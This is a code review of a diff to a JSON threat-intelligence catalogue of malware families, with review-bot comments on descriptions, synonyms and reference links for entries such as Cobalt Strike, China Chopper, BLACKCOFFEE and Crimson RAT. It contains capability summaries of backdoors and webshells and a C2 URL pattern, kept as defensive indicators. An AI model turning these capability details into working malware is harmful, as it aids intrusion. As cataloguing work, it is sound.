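Review bot: The Aurora hunk adds a decryptor ref but leaves the description empty, so the one fact an incident responder most needs — a free decryptor exists — is only discoverable by reading the URL. Both cited BleepingComputer articles support `"description": "Ransomware seen distributed by AZORult; a free decryptor (AuroraDecrypter) is available, see refs."`.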
@@ -3708,8 +4524,10 @@ "https://malwarebreakdown.com/2017/07/24/the-seamless-campaign-drops-ramnit-follow-up-malware-azorult-stealer-smoke-loader-etc/", "https://www.proofpoint.com/us/threat-insight/post/threat-actors-using-legitimate-paypal-accounts-to-distribute-chthonic-banking-trojan", "http://www.vkremez.com/2017/07/lets-learn-reversing-credential-and.html", + "https://blog.minerva-labs.com/azorult-now-as-a-signed-google-update", "https://www.proofpoint.com/us/threat-insight/post/new-version-azorult-stealer-improves-loading-features-spreads-alongside", "https://malwarebreakdown.com/2017/11/12/seamless-campaign-delivers-ramnit-via-rig-ek-at-188-225-82-158-follow-up-malware-is-azorult-stealer/", + "https://www.blueliv.com/blog-news/research/azorult-crydbrox-stops-sells-malware-credential-stealer/", "https://research.checkpoint.com/the-emergence-of-the-new-azorult-3-3/" ], "synonyms": [ @@ -3740,6 +4558,19 @@ "uuid": "947dffa1-0184-48d4-998e-1899ad97e93e", "value": "Babar" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.babylon_rat", + "https://twitter.com/KorbenD_Intel/status/1110654679980085262" + ], + "synonyms": [], + "type": [] + }, + "uuid": "1a196c09-f7cd-4a6e-bc3c-2489121b5381", + "value": "BabyLon RAT" + }, { "description": "", "meta": { 
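Review bot: BabyLon RAT is added with an empty description and a single tweet as its only reference besides Malpedia; tweets vanish and cannot be cited in a report, so the entry gives an analyst nothing beyond the name. Make the gap explicit (`"description": "Commodity RAT; no public write-up at time of adding, see referenced tweet."`) so it is obvious the entry needs a follow-up once an analysis exists. The same pattern appears for Amadey earlier in this change, which at least also cites a blog analysis.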
@@ -3753,6 +4584,19 @@ "uuid": "30c2e5c6-851d-4f3a-8b6e-2e7b69a26467", "value": "BABYMETAL" }, + { + "description": "FireEye describes BACKBEND as a secondary downloader used as a backup mechanism in the case the primary backdoor is removed. When executed, BACKBEND checks for the presence of the mutexes MicrosoftZj or MicrosoftZjBak (both associated with BACKSPACE variants). If either of the mutexes exist, the malware exits.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.backbend", + "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "934da8b2-f66e-4056-911e-1da09216e8b8", + "value": "BACKBEND" + }, { "description": "", "meta": { @@ -3811,11 +4655,12 @@ "value": "BadEncript" }, { - "description": "", + "description": "BADFLICK, a backdoor that is capable of modifying the file system, generating a reverse shell, and modifying its command-and-control configuration.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.badflick", - "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html" + "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html", + "https://blog.amossys.fr/badflick-is-not-so-bad.html" ], "synonyms": [], "type": [] @@ -3866,6 +4711,22 @@ "uuid": "4038c3bc-b559-45bb-bac1-9665a54dedf9", "value": "Bahamut (Windows)" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.baldir", + "https://blog.malwarebytes.com/threat-analysis/2019/04/say-hello-baldr-new-stealer-market/", + "https://www.youtube.com/watch?v=E2V4kB_gtcQ" + ], + "synonyms": [ + "Baldr" + ], + "type": [] + }, + "uuid": "7024893a-96fe-4de4-bb04-c1d4794a4c95", + "value": "Baldir" + }, { "description": "", "meta": { 
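Review bot: The new BADFLICK description is a sentence fragment (`"BADFLICK, a backdoor that is capable of ..."`) cut mid-sentence from the FireEye post. `"BADFLICK is a backdoor capable of modifying the file system, spawning a reverse shell, and updating its command-and-control configuration."` reads as a standalone statement and preserves every claim in the original.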
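Review bot: The Baldir entry makes `Baldir` the display value and `Baldr` the synonym, while the cited Malwarebytes post names the stealer `Baldr`; if `Baldir` exists only as the Malpedia slug (`win.baldir`), the two should be swapped so the name analysts see matches public reporting. If `Baldir` is a genuinely used spelling, saying so in the description would stop the next reviewer from flagging it again.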
@@ -3976,6 +4837,19 @@ "uuid": "cad1d6db-3a6c-4d67-8f6e-627d8a168d6a", "value": "BBSRAT" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.beapy", + "https://www.symantec.com/blogs/threat-intelligence/beapy-cryptojacking-worm-china" + ], + "synonyms": [], + "type": [] + }, + "uuid": "404e8121-bced-4320-a984-2b490fad90f8", + "value": "Beapy" + }, { "description": "", "meta": { @@ -3989,7 +4863,7 @@ "value": "Bedep" }, { - "description": "", + "description": "BEENDOOR is a XMPP based trojan. It is capable of taking screenshots of the victim's desktop.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.beendoor", 
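Review bot: The new BEENDOOR description has a grammar slip (`a XMPP based trojan`) and buries the detection-relevant fact — XMPP as the C2 transport — behind the screenshot capability. `"BEENDOOR is an XMPP-based trojan (C2 over XMPP) capable of taking screenshots of the victim's desktop."` keeps both claims and puts the transport first.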
@@ -4001,12 +4875,38 @@ "uuid": "e2dca2b5-7ca0-4654-ae3d-91dab60dfd90", "value": "beendoor" }, + { + "description": "Once set up in the system, Trojan.Belonard replaces the list of available game servers in the game client and creates proxies on the infected computer to spread the Trojan. As a rule, proxy servers show a lower ping, so other players will see them at the top of the list. By selecting one of them, a player gets redirected to a malicious server where their computer become infected with Trojan.Belonard.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.belonard", + "https://news.drweb.com/show/?i=13135&c=23&lng=en&p=0" + ], + "synonyms": [], + "type": [] + }, + "uuid": "40c48c99-7d33-4f35-92f1-937c3686afa7", + "value": "Belonard" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.berbomthum", + "https://blog.trendmicro.com/trendlabs-security-intelligence/cybercriminals-use-malicious-memes-that-communicate-with-malware/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "6944cbe7-db95-422d-8751-98c9fc4f0b12", + "value": "Berbomthum" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bernhardpos", - "https://www.morphick.com/resources/news/bernhardpos-new-pos-malware-discovered-morphick" + "https://securitykitten.github.io/2015/07/14/bernhardpos.html" ], "synonyms": [], "type": [] 
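Review bot: The Belonard description never names the game client whose server list it replaces, so `in the game client` is meaningless without opening the Dr.Web ref (which, as I recall, concerns Counter-Strike 1.6 — confirm against the article and name it). Berbomthum in the same hunk has no description although its Trend Micro ref title states the notable behaviour; `"description": "Malware that retrieves its commands from images (memes) posted on social media, per Trend Micro."` captures the steganographic C2 a defender would want to know about. Swapping the dead Morphick link for the author's own BernhardPOS post is fine.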
@@ -4036,6 +4936,19 @@ "uuid": "837c5618-69dc-4817-8672-b3d7ae644f5c", "value": "BetaBot" }, + { + "description": "Bezigate is a Trojan horse that opens a back door on the compromised computer. It may also download potentially malicious files. \r\n\r\nThe Trojan may perform the following actions: \r\nList, move, and delete drives\r\nList, move, and delete files\r\nList processes and running Windows titles\r\nList services\r\nList registry values\r\nKill processes\r\nMaximize, minimize, and close windows\r\nUpload and download files\r\nExecute shell commands\r\nUninstall itself", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bezigate", + "https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "29f45180-cb57-4655-8812-eb814c2a0b0e", + "value": "Bezigate" + }, { "description": "", "meta": { @@ -4063,6 +4976,20 @@ "uuid": "42ed9fc4-08ba-4c1c-bf15-d789ee4e3ca6", "value": "BillGates" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.biodata", + "https://unit42.paloaltonetworks.com/unit42-recent-inpage-exploits-lead-multiple-malware-families/", + "https://ti.360.net/blog/articles/analysis-of-targeted-attack-against-pakistan-by-exploiting-inpage-vulnerability-and-related-apt-groups-english/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "96bcaa83-998b-4fb2-a4e7-a2d33c6427d7", + "value": "BioData" + }, { "description": "", "meta": { 
@@ -4091,6 +5018,20 @@ "uuid": "3e072464-6fa6-4977-9b64-08f86d1062fc", "value": "Bitsran" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bitter_rat", + "https://ti.360.net/blog/articles/analysis-of-targeted-attack-against-pakistan-by-exploiting-inpage-vulnerability-and-related-apt-groups-english/", + "https://www.forcepoint.com/blog/security-labs/bitter-targeted-attack-against-pakistan" + ], + "synonyms": [], + "type": [] + }, + "uuid": "265f96d1-fdd4-4dec-b7ca-51ae6f726634", + "value": "Bitter RAT" + }, { "description": "BKA Trojaner is a screenlocker ransomware that was active in 2011, displaying a police-themed message in German language.", "meta": { @@ -4106,6 +5047,22 @@ "uuid": "ea06f87c-148c-49e5-afec-7012cb2b4f0a", "value": "BKA Trojaner" }, + { + "description": "a backdoor that obfuscates its communications as normal traffic to legitimate websites such as Github and Microsoft's Technet portal.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackcoffee", + "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html", + "https://attack.mitre.org/software/S0069/", + "https://www2.fireeye.com/rs/fireye/images/APT17_Report.pdf", + "http://malware-log.hatenablog.com/entry/2015/05/18/000000_1" + ], + "synonyms": [], + "type": [] + }, + "uuid": "ff660bf2-a9e4-4973-be0c-9f6618e40899", + "value": "BLACKCOFFEE" + }, { "description": "", "meta": { @@ -4113,6 +5070,7 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackenergy", "https://securelist.com/blackenergy-apt-attacks-in-ukraine-employ-spearphishing-with-word-documents/73440/", "https://securelist.com/be2-extraordinary-plugins-siemens-targeting-dev-fails/68838/", + "https://marcusedmondson.com/2019/01/18/black-energy-analysis/", "https://securelist.com/be2-custom-plugins-router-abuse-and-target-profiles/67353/" ], "synonyms": [], 
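Review bot: The BLACKCOFFEE description starts mid-sentence (`"a backdoor that obfuscates..."`) and, more importantly, describes the technique loosely: as I read the cited FireEye APT17 report, TechNet and GitHub pages are used as a dead-drop resolver — the malware reads encoded C2 addresses from profile/forum pages and then connects to the real C2 — rather than as the C2 channel itself. That distinction changes what a defender hunts for (requests to those pages followed by a new outbound connection, not TechNet traffic as such). Suggested: `"BLACKCOFFEE is a backdoor, associated with APT17, that retrieves encoded C2 addresses from pages on legitimate sites such as GitHub and Microsoft's TechNet (dead-drop resolver) before contacting its real C2."`.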
@@ -4151,6 +5109,22 @@ "uuid": "6a5bd819-5fbc-437b-92c4-ce0dfb5c67f8", "value": "BlackRevolution" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackrouter", + "https://www.bleepingcomputer.com/news/security/blackrouter-ransomware-promoted-as-a-raas-by-iranian-developer/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/legitimate-application-anydesk-bundled-with-new-ransomware-variant/" + ], + "synonyms": [ + "BLACKHEART" + ], + "type": [] + }, + "uuid": "0b235fbf-c191-47c0-ae83-9386a64b1c79", + "value": "BlackRouter" + }, { "description": "", "meta": { @@ -4226,7 +5200,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bozok", - "https://www.fireeye.com/blog/threat-research/2013/10/know-your-enemy-tracking-a-rapidly-evolving-apt-actor.html" + "https://www.fireeye.com/blog/threat-research/2013/10/know-your-enemy-tracking-a-rapidly-evolving-apt-actor.html", + "https://unit42.paloaltonetworks.com/unit42-projectm-link-found-between-pakistani-actor-and-operation-transparent-tribe" ], "synonyms": [], "type": [] @@ -4234,6 +5209,19 @@ "uuid": "f9d0e934-879c-4668-b959-6bf7bdc96f5d", "value": "Bozok" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.brain", + "https://www.welivesecurity.com/2017/01/18/flashback-wednesday-pakistani-brain/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "1619ee64-fc54-47c0-8ee1-8b786fefc0fd", + "value": "BRAIN" + }, { "description": "", "meta": { 
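Review bot: `"value": "BRAIN"` with no description is ambiguous: all-caps names in this file otherwise come from vendor codenames (BACKBEND, BUBBLEWRAP, BLACKCOFFEE), whereas the single ref is an ESET retrospective on the 1986 Pakistani "Brain" boot-sector virus. `"value": "Brain"` with `"description": "Brain, the 1986 boot-sector virus from Pakistan, widely considered the first PC virus; historical entry."` would stop it being mistaken for a modern tool.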
@@ -4263,7 +5251,20 @@ "value": "BravoNC" }, { - "description": "There is no reference available for this family and all known samples have version 1.0.0.\r\n\r\nPdb-strings in the samples suggest that this is an \"exclusive\" loader, known as \"breakthrough\" (maybe), e.g. C:\\Users\\Exclusiv\\Desktop\\хп-пробив\\Release\\build.pdb\r\n\r\nThe communication url parameters are pretty unique in this combination:\r\ngate.php?hwid=&os=&build=1.0.0&cpu=8\r\n\r\n is one of:\r\nWindows95\r\nWindows98\r\nWindowsMe\r\nWindows95family\r\nWindowsNT3\r\nWindowsNT4\r\nWindows2000\r\nWindowsXP\r\nWindowsServer2003\r\nWindowsNTfamily\r\nWindowsVista\r\nWindows7\r\nWindows8\r\nWindows10\r\n", + "description": "This is a backdoor which FireEye call the Breach Remote Administration Tool (BreachRAT), written in C++. The malware name is derived from the hardcoded PDB path found in the RAT: C:\\Work\\Breach Remote Administration Tool\\Release\\Client.pdb", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.breach_rat", + "https://www.fireeye.com/blog/threat-research/2016/06/apt_group_sends_spea.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "52cf2986-89e8-463d-90b6-e4356c9777e7", + "value": "BreachRAT" + }, + { + "description": "There is no reference available for this family and all known samples have version 1.0.0.\r\n\r\nPdb-strings in the samples suggest that this is an \"exclusive\" loader, known as \"breakthrough\" (maybe), e.g. 
C:\\Users\\Exclusiv\\Desktop\\\u0445\u043f-\u043f\u0440\u043e\u0431\u0438\u0432\\Release\\build.pdb\r\n\r\nThe communication url parameters are pretty unique in this combination:\r\ngate.php?hwid=&os=&build=1.0.0&cpu=8\r\n\r\n is one of:\r\nWindows95\r\nWindows98\r\nWindowsMe\r\nWindows95family\r\nWindowsNT3\r\nWindowsNT4\r\nWindows2000\r\nWindowsXP\r\nWindowsServer2003\r\nWindowsNTfamily\r\nWindowsVista\r\nWindows7\r\nWindows8\r\nWindows10\r\n", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.breakthrough_loader" @@ -4288,6 +5289,19 @@ "uuid": "55d343a1-7e80-4254-92eb-dfb433b91a90", "value": "Bredolab" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.brushaloader", + "https://blog.talosintelligence.com/2019/02/combing-through-brushaloader.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "75a03c4f-8a97-4fc0-a69e-b2e73e4564fc", + "value": "BrushaLoader" + }, { "description": "", "meta": { @@ -4328,6 +5342,20 @@ "uuid": "d29786c6-2cc0-4e2f-97b0-242a1d9e9bf8", "value": "BTCWare" }, + { + "description": "BUBBLEWRAP is a full-featured backdoor that is set to run when the system boots, and can communicate using HTTP, HTTPS, or a SOCKS proxy. This backdoor collects system information, including the operating system version and hostname, and includes functionality to check, upload, and register plugins that can further enhance its capabilities.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bubblewrap", + "https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html", + "https://attack.mitre.org/software/S0043/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "d114ee6c-cf7d-408a-8077-d59e736f5a66", + "value": "BUBBLEWRAP" + }, { "description": "", "meta": { 
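Review bot: The re-escaped breakthrough_loader description at the end of this hunk carries a pre-existing mangling that this rewrite could have fixed: `gate.php?hwid=&os=&build=1.0.0&cpu=8` followed by ` is one of:` has lost the placeholder for the OS value, most likely an angle-bracketed token stripped as HTML, so the list of Windows versions dangles with no subject. Since the `-`/`+` pair already touches this line, restore it as `gate.php?hwid=<hwid>&os=<os>&build=1.0.0&cpu=8` and `<os> is one of:` (or a plain-text `OS` placeholder if angle brackets are a problem downstream). The BreachRAT entry added in the same hunk is fine; its PDB path is a useful artifact to keep.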
@@ -4345,10 +5373,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.buhtrap", - "https://www.group-ib.com/brochures/gib-buhtrap-report.pdf", + "https://malware-research.org/carbanak-source-code-leaked/", "https://www.symantec.com/connect/blogs/russian-bank-employees-received-fake-job-offers-targeted-email-attack", + "https://www.welivesecurity.com/2015/04/09/operation-buhtrap/", + "https://www.group-ib.com/brochures/gib-buhtrap-report.pdf", "https://www.arbornetworks.com/blog/asert/diving-buhtrap-banking-trojan-activity/", - "https://www.welivesecurity.com/2015/04/09/operation-buhtrap/" + "https://blog.dcso.de/pegasus-buhtrap-analysis-of-the-malware-stage-based-on-the-leaked-source-code/" ], "synonyms": [ "Ratopak" @@ -4381,8 +5411,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bunitu", + "https://malwarebreakdown.com/2018/03/21/fobos-malvertising-campaign-delivers-bunitu-proxy-trojan-via-rig-ek/", "https://zerophagemalware.com/2017/06/07/rig-ek-via-fake-eve-online-website-drops-bunitu/", "http://malware-traffic-analysis.net/2017/05/09/index.html", + "https://broadanalysis.com/2019/04/12/rig-exploit-kit-delivers-bunitu-malware/", "https://blog.malwarebytes.com/threat-analysis/2015/07/revisiting-the-bunitu-trojan/", "https://blog.malwarebytes.com/threat-analysis/2015/08/whos-behind-your-proxy-uncovering-bunitus-secrets/" ], @@ -4505,6 +5537,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cannon", + "https://www.vkremez.com/2018/11/lets-learn-in-depth-on-sofacy-canon.html", "https://researchcenter.paloaltonetworks.com/2018/11/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/" ], "synonyms": [], 
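Review bot: The Buhtrap refs now include `malware-research.org/carbanak-source-code-leaked/`, whose title names a different family; if it is filed here because the leak first reported as Carbanak turned out to be Buhtrap source, a reader of the cluster has no way to know that. Add a line to the description, e.g. `"Banking malware targeting Russian financial institutions; its source code has leaked (initially misreported as Carbanak), see refs."`, or rely on the DCSO analysis already cited and drop the ambiguous link. The group-ib URL is removed and re-added in the same hunk, which is ordering noise.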
@@ -4518,6 +5551,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.carbanak", + "https://www.fireeye.com/blog/threat-research/2019/04/carbanak-week-part-one-a-rare-occurrence.html", "https://www.fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoor.html", "https://www.fox-it.com/en/wp-content/uploads/sites/11/Anunak_APT-against-financial-institutions2.pdf", "https://securelist.com/files/2015/02/Carbanak_APT_eng.pdf" @@ -4547,7 +5581,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cardinal_rat", - "http://researchcenter.paloaltonetworks.com/2017/04/unit42-cardinal-rat-active-two-years/?adbsc=social71702736&adbid=855028404965433346&adbpl=tw&adbpr=4487645412" + "http://researchcenter.paloaltonetworks.com/2017/04/unit42-cardinal-rat-active-two-years/?adbsc=social71702736&adbid=855028404965433346&adbpl=tw&adbpr=4487645412", + "https://unit42.paloaltonetworks.com/cardinal-rat-sins-again-targets-israeli-fin-tech-firms/" ], "synonyms": [], "type": [] @@ -4555,6 +5590,19 @@ "uuid": "3d3da4c0-004c-400c-9da6-f83fd35d907e", "value": "Cardinal RAT" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.carrotbat", + "https://unit42.paloaltonetworks.com/unit42-the-fractured-block-campaign-carrotbat-malware-used-to-deliver-malware-targeting-southeast-asia/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "4ad06a5f-12e6-44ae-9547-98ee62114357", + "value": "CarrotBat" + }, { "description": "ESET describes Casper as a well-developed reconnaissance tool, making extensive efforts to remain unseen on targeted machines. Of particular note are the specific strategies adopted against anti-malware software. Casper was used against Syrian targets in April 2014, which makes it the most recent malware from this group publicly known at this time.", "meta": { 
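Review bot: The Cardinal RAT ref keeps the full social-media tracking query (`?adbsc=social71702736&adbid=...&adbpl=tw&adbpr=...`) on the Palo Alto URL even though the line is being rewritten; those parameters identify a click, carry nothing needed to resolve the article, and get copied into reports from here. Trim it to `http://researchcenter.paloaltonetworks.com/2017/04/unit42-cardinal-rat-active-two-years/`, and a quick grep for `?adb` / `utm_` in refs would catch any others in the file.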
@@ -4714,6 +5762,22 @@ "uuid": "2137a0ce-8d06-4538-ad0b-6ab6ec865493", "value": "ChewBacca" }, + { + "description": "a simple code injection webshell that executes Microsoft .NET code within HTTP POST commands. This allows the shell to upload and download files, execute applications with web server account permissions, list directory contents, access Active Directory, access databases, and any other action allowed by the .NET runtime.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.chinachopper", + "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html", + "https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html", + "https://informationonsecurity.blogspot.com/2012/11/china-chopper-webshell.html", + "https://attack.mitre.org/software/S0020/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "0d8f0bb7-e14f-4b85-baa1-6ec951aa6c53", + "value": "CHINACHOPPER" + }, { "description": "Adware that shows advertisements using plugin techniques for popular browsers", "meta": { 
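Review bot: The CHINACHOPPER description starts mid-sentence with a lowercase `a simple code injection webshell ...` and the value uses the all-caps vendor spelling while `synonyms` is empty, so a lookup by the common name that every ref URL in the hunk uses, China Chopper, matches nothing. Suggest `"description": "China Chopper is a simple code injection webshell that executes Microsoft .NET code within HTTP POST commands. ..."` and `"synonyms": ["China Chopper"]`.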
@@ -4829,18 +5893,36 @@ "value": "CMSTAR" }, { - "description": "Cobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon includes a wealth of functionality to the attacker, including, but not limited to:\r\n\r\n* Execute commands\r\n* Log keystrokes\r\n* Upload/download files\r\n* SOCKS proxy\r\n* Privilege escalation\r\n* Mimikatz\r\n* Port scanning\r\n* Lateral Movement\r\n\r\nThe Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.", + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.coalabot", + "https://malware.dontneedcoffee.com/2017/10/coalabot-http-ddos-bot.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "7acd9a27-f550-4c47-9fc8-429b61b04217", + "value": "CoalaBot" + }, + { + "description": "Cobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon includes a wealth of functionality to the attacker, including, but not limited to command execution, key logging, file transfer, SOCKS proxying, privilege escalation, mimikatz, port scanning and lateral movement. Beacon is in-memory/file-less, in that it consists of stageless or multi-stage shellcode that once loaded by exploiting a vulnerability or executing a shellcode loader, will reflectively load itself into the memory of a process without touching the disk. It supports C2 and staging over HTTP, HTTPS, DNS, SMB named pipes as well as forward and reverse TCP; Beacons can be daisy-chained. 
Cobalt Strike comes with a toolkit for developing shellcode loaders, called Artifact Kit.\r\n\r\nThe Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike", "https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html", "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks", "https://github.com/JPCERTCC/aa-tools/blob/master/cobaltstrikescan.py", - "https://www.lac.co.jp/lacwatch/people/20180521_001638.html", + "https://blogs.jpcert.or.jp/en/2018/08/volatility-plugin-for-detecting-cobalt-strike-beacon.html", + "https://blog.cobaltstrike.com/", + "https://www.cobaltstrike.com/support", "https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html", - "https://blog.cobaltstrike.com/2018/04/09/cobalt-strike-3-11-the-snake-that-eats-its-tail/", + "http://blog.morphisec.com/new-global-attack-on-point-of-sale-systems", + "https://www.lac.co.jp/lacwatch/people/20180521_001638.html", + "https://401trg.com/burning-umbrella/ ", + "https://www.pentestpartners.com/security-blog/cobalt-strike-walkthrough-for-red-teamers/", "https://pylos.co/2018/11/18/cozybear-in-from-the-cold/", - "https://blogs.jpcert.or.jp/en/2018/08/volatility-plugin-for-detecting-cobalt-strike-beacon.html" + "http://cyberforensicator.com/2018/12/23/dissecting-cozy-bears-malicious-lnk-file/" ], "synonyms": [], "type": [] 
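Review bot: The new reference `"https://401trg.com/burning-umbrella/ "` has a trailing space inside the string, which fails URL validation and defeats de-duplication against the same URL elsewhere in the galaxy; it should read `"https://401trg.com/burning-umbrella/"`. Two other additions, `https://blog.cobaltstrike.com/` and `https://www.cobaltstrike.com/support`, are vendor landing pages rather than analyses, and the dated 3.11 release post they appear to replace was the more citable reference, so keeping it alongside them seems preferable. On this page the rewritten description string is split across two lines after "daisy-chained. "; presumably it is one line in the file, but it is worth checking that no literal newline was introduced into the JSON string.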
@@ -5061,11 +6143,13 @@ "https://www.honeynet.org/files/KYE-Conficker.pdf", "https://www.sophos.com/fr-fr/medialibrary/PDFs/marketing%20material/confickeranalysis.pdf", "http://www.csl.sri.com/users/vinod/papers/Conficker/addendumC/index.html", + "https://www.kaspersky.com/about/press-releases/2009_kaspersky-lab-analyses-new-version-of-kido--conficker", "https://github.com/tillmannw/cnfckr", "http://www.confickerworkinggroup.org/wiki/uploads/Conficker_Working_Group_Lessons_Learned_17_June_2010_final.pdf", "http://contagiodump.blogspot.com/2009/05/win32conficker.html" ], "synonyms": [ + "Kido", "downadup", "traffic converter" ], @@ -5129,6 +6213,19 @@ "uuid": "495377c4-1be5-4c65-ba66-94c221061415", "value": "Corebot" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.coredn", + "https://blog.talosintelligence.com/2019/01/fake-korean-job-posting.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "331f0c80-a795-48aa-902e-0b0d57de85f5", + "value": "CoreDN" + }, { "description": "", "meta": { @@ -5166,6 +6263,7 @@ "https://www.welivesecurity.com/2017/06/12/industroyer-biggest-threat-industrial-control-systems-since-stuxnet/", "https://dragos.com/blog/crashoverride/CrashOverride-01.pdf", "https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf", + "https://www.virusbulletin.com/conference/vb2017/abstracts/last-minute-paper-industroyer-biggest-threat-industrial-control-systems-stuxnet/", "https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/" ], "synonyms": [ 
@@ -5177,6 +6275,19 @@ "uuid": "610d5ce7-c9c8-4fb1-94d9-69b7cb5397b6", "value": "CrashOverride" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.creamsicle", + "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "9d193a65-dc18-4832-9daa-aab245cd1c86", + "value": "CREAMSICLE" + }, { "description": "", "meta": { @@ -5207,13 +6318,17 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.crimson", + "https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf", + "https://s.tencent.com/research/report/669.html", "https://www.amnesty.org/download/Documents/ASA3383662018ENGLISH.PDF" ], - "synonyms": [], + "synonyms": [ + "SEEDOOR" + ], "type": [] }, "uuid": "a61fc694-a88a-484d-a648-db35b49932fd", - "value": "Crimson" + "value": "Crimson RAT" }, { "description": "", @@ -5235,11 +6350,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryakl", - "https://securelist.ru/shifrovalshhik-cryakl-ili-fantomas-razbushevalsya/24070/", + "https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Cryakl-B/detailed-analysis.aspx", "https://www.v3.co.uk/v3-uk/news/3026414/belgian-police-release-decryption-keys-for-cryakl-ransomware", "https://hackmag.com/security/ransomware-russian-style/", - "https://twitter.com/demonslay335/status/971164798376468481", - "https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Cryakl-B/detailed-analysis.aspx" + "https://securelist.com/the-return-of-fantomas-or-how-we-deciphered-cryakl/86511/", + "https://securelist.ru/shifrovalshhik-cryakl-ili-fantomas-razbushevalsya/24070/", + "https://twitter.com/demonslay335/status/971164798376468481" ], "synonyms": [], "type": [] 
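Review bot: Renaming `"value": "Crimson"` to `"Crimson RAT"` keeps the uuid, which is the right way to do it, but drops the old display name entirely, so anything that matched this entry by value rather than uuid now misses it. Keep the previous name as an alias next to the new one: `"synonyms": ["Crimson", "SEEDOOR"]`. The Cryakl hunk in the same line removes the securelist.ru and twitter refs only to re-add them lower down, a pure reorder that inflates the diff without changing content.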
